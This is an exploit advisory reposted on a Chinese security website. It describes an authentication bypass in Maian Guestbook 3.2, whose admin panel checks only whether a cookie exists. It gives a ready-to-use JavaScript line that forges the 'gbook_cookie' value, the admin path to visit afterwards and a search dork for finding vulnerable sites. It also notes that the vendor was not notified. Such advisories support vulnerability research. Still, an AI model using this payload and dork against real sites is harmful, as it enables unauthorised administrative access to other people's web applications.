首页 > 网络安全 > Exploit

Maian Guestbook

admin Exploit 2022-02-17 09:43:26 the   Guestbook   Maian   cookie   &lt   Insecure   and   &quot"
-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-



[*] Discovered By: S.W.A.T.
[*] E-Mail: svvateam[at]yahoo[dot]com
[*] Script Download: http://www.maianscriptworld.co.uk
[*] DORK: Powered by Maian Guestbook v3.2



[*] Vendor Has Not Been Notified!



[*] DESCRIPTION:

Maian Guestbook suffers from a insecure cookie, the admin panel only checks if the

cookie exists.
and not the content. so we can easyily craft a cookie and look like a admin.



[*] Vulnerability:

javascript:document.cookie = "gbook_cookie=1; path=/";


[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.



-[*] ================================================================================ [*]-
-[*] Maian Guestbook <= 3.2 Insecure Cookie Handling Vulnerability [*]-
-[*] ================================================================================ [*]-
版权声明

本文仅代表作者观点,不代表本站立场。
本文系作者授权发表,未经许可,不得转载。
本文地址:/websafe/Exploit/149377.html

留言与评论(共有 0 条评论)
   
验证码:

潘少俊衡

| 桂ICP备2023010378号-4

Powered By EmpireCMS

爱享小站

中德益农

谷姐神农

环亚肥料

使用手机软件扫描微信二维码

关注我们可获取更多热点资讯

感谢潘少俊衡友情技术支持